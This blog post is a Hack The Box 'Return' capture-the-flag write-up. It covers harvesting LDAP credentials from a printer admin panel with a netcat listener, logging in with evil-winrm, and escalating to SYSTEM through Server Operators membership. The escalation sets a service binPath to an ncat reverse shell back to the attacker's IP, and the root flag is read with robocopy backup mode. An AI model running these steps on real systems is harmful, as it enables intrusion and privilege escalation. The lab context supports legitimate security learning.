Home Hack The Box - Return
Post
Cancel

Hack The Box - Return

Return was an easy box that involved exploiting a printer’s web administration panel to obtain LDAP credentials. These credentials can then be used to access WinRM. The account obtained through this method is part of the Server Operators group, which gives it the ability to control and manipulate services. This privilege will be used to gain a shell with SYSTEM level access

RECON

NMAP

Nmap shows multiple ports open.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
Snmap -p- --min-rate 10000 -oN return.nmap 10.10.11.108 
Nmap scan report for 10.10.11.108 
Host is up (0.075s latency). 
Not shown: 65510 closed tcp ports (reset) 
PORT      STATE SERVICE 
53/tcp    open  domain 
80/tcp    open  http 
88/tcp    open  kerberos-sec 
135/tcp   open  msrpc 
139/tcp   open  netbios-ssn 
389/tcp   open  ldap 
445/tcp   open  microsoft-ds 
464/tcp   open  kpasswd5 
593/tcp   open  http-rpc-epmap 
636/tcp   open  ldapssl 
3268/tcp  open  globalcatLDAP 
3269/tcp  open  globalcatLDAPssl 
5985/tcp  open  wsman 
9389/tcp  open  adws 
47001/tcp open  winrm 
49664/tcp open  unknown 
49665/tcp open  unknown 
49666/tcp open  unknown 
49668/tcp open  unknown 
49671/tcp open  unknown 
49674/tcp open  unknown 
49675/tcp open  unknown 
49679/tcp open  unknown 
49682/tcp open  unknown 
49694/tcp open  unknown 
# Nmap done at Sat Jan 28 11:34:27 2023 -- 1 IP address (1 host up) scanned in 9.47 seconds


$nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49674,49675,49679,49682,49694 -sC -sV 10.10.11.108 -oN tcp-service-return.nmap 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-28 11:41 +0545 
Nmap scan report for 10.10.11.108 
Host is up (0.074s latency). 
PORT      STATE SERVICE       VERSION 
53/tcp    open  domain        Simple DNS Plus 
80/tcp    open  http          Microsoft IIS httpd 10.0 
|_http-server-header: Microsoft-IIS/10.0 
|_http-title: HTB Printer Admin Panel 
| http-methods: 
|_  Potentially risky methods: TRACE 
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-28 06:15:02Z) 
135/tcp   open  msrpc         Microsoft Windows RPC 
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn 
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 
445/tcp   open  microsoft-ds? 
464/tcp   open  kpasswd5? 
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 
636/tcp   open  tcpwrapped 
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 
3269/tcp  open  tcpwrapped 
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Not Found 
9389/tcp  open  mc-nmf        .NET Message Framing 
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-server-header: Microsoft-HTTPAPI/2.0 
|_http-title: Not Found 
49664/tcp open  msrpc         Microsoft Windows RPC 
49665/tcp open  msrpc         Microsoft Windows RPC 
49666/tcp open  msrpc         Microsoft Windows RPC 
49668/tcp open  msrpc         Microsoft Windows RPC 
49671/tcp open  msrpc         Microsoft Windows RPC 
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 
49675/tcp open  msrpc         Microsoft Windows RPC 
49679/tcp open  msrpc         Microsoft Windows RPC 
49682/tcp open  msrpc         Microsoft Windows RPC 
49694/tcp open  msrpc         Microsoft Windows RPC 
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows 
Host script results: 
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required 
|_clock-skew: 17m55s 
| smb2-time: 
|   date: 2023-01-28T06:15:58 
|_  start_date: N/A 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 73.76 seconds

PORT 80

Since port is open, when we try to access the site via a browser the site is displayed as “HTB Printer Admin Panel”

On navigating to the settings page

The above settings shows us the username which is svc-printer and the hardcoded password which has been masked.

SHELL AS SVC-PRINTER

CREDENTIAL DUMPING

Once we change the server ip address to our ip address , open a netcat listener on port 389 and click on update .

we receive a password 1edFg43012!!

1
2
3
4
5
$sudo nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 60888
0*`%return\svc-printer▒
1edFg43012!!

Using evil-winrm to establish a remote connection.

1
2
3
4
5
6
7
8
$evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer

SHELL AS ADMINISTRATOR

ENUMERATION

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
*Evil-WinRM* PS C:\Users\svc-printer> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/28/2023 4:56:36 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

Here, we can see that svc-printer is a member of Server Operators group which seems interesting.

SERVER OPERATOR

In Windows, the “Server Operators” group is a built-in security group that allows members to perform a limited set of administrative tasks on a server.By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer.

PRIVILEGES

svc-printer does have quite interesting privileges which can lead us to system.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\svc-printer> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

METHOD 1 - REPLACING SERVICE BINARY PATH

ENUMERATING INSTALLED SERVICES

we found a list of installed services and their path along with true/false flags for privileges.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\svc-printer> services

Path                                                                                                                 Privileges Service
----                                                                                                                 ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                                                                  True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys       True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                              True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe                                                                                           True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                False Sense
C:\Windows\servicing\TrustedInstaller.exe                                                                                 False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                     True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"                                                                        True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"                                             True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"                                            True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe"                                                                      False WMPNetworkSvc

Since, svc-printer is a member of server operator group. we can change the binary path of service, replace it with a netcat binary and restart the service to get the reverse shell. First we will upload ncat.exe

1
2
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> upload ncat.exe
Info: Upload successful!

We will now repalce the binary path of VMTools service with our ncat.exe

1
2
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\ncat.exe -e cmd.exe 10.10.14.11 4444"
[SC] ChangeServiceConfig SUCCESS

once we open netcat listener on our machine and restart the service of VMTools we get shell as a Administrator.

1
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe start VMTools
1
2
3
4
5
6
7
8
9
$sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 60966
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

we have got the shell as administrator but after 30 seconds, the service times out, and returns an error message and the shell terminates.

STABLE SHELL AS ADMINISTRATOR

If we have the service binary set to cmd.exe and have it start ncat.exe, the ncat.exe process will continue running even after cmd.exe is killed. This is because when cmd.exe starts ncat.exe, it creates a new process that is separate from the cmd.exe process. When the service fails to start in a service way, the cmd.exe process is killed but the ncat.exe process is still running as it was started by cmd.exe process, it is not dependent on it.

1
2
3
4
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe config VMTools binPath="C:\windows\system32\cmd.exe /c C:\Users\svc-printer\Desktop\ncat.exe -e cmd 10.10.14.11
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc stop VMTools
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe start VMTools
1
2
3
4
5
6
7
8
9
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 61106
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

METHOD 2: FILE READ

Since svc-printer has both SeBackupPrivilege and SeRestorePrivilege privilege we can use robocopy to read files.

Non-admin user can use Robocopy to copy files and directories that are normally only accessible by administrators, if they are granted the SeBackupPrivilege and SeRestorePrivilege. The easiest way is to use the /B option to run Robocopy in “backup mode” which tells Robocopy to use the Volume Shadow Copy Service (VSS) to create a shadow copy of the volume being copied, and thus allows Robocopy to access files that are otherwise locked or in use

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> robocopy /b C:\users\administrator\desktop C:\programdata\temp
-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Saturday, January 28, 2023 8:45:40 AM
   Source : C:\users\administrator\desktop\
     Dest : C:\programdata\temp\

    Files : *.*

  Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           2    C:\users\administrator\desktop\
            New File                  34        root.txt
  0%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         2         1         1         0         0         0
   Bytes :       316        34       282         0         0         0
   Times :   0:00:00   0:00:00                       00:00:00   0:00:00
   Ended : Saturday, January 28, 2023 8:45:40 AM

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cd C:\programdata\temp
*Evil-WinRM* PS C:\programdata\temp> dir


    Directory: C:\programdata\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        1/27/2023  10:06 PM             34 root.txt

now we can read the root file

1
2
*Evil-WinRM* PS C:\programdata\temp> type root.txt
3a8e0ddbc41e01511f43c310d8fd6eca
This post is licensed under CC BY 4.0 by the author.

Hack The Box - Active

Hack The Box - Timelapse

Comments powered by Disqus.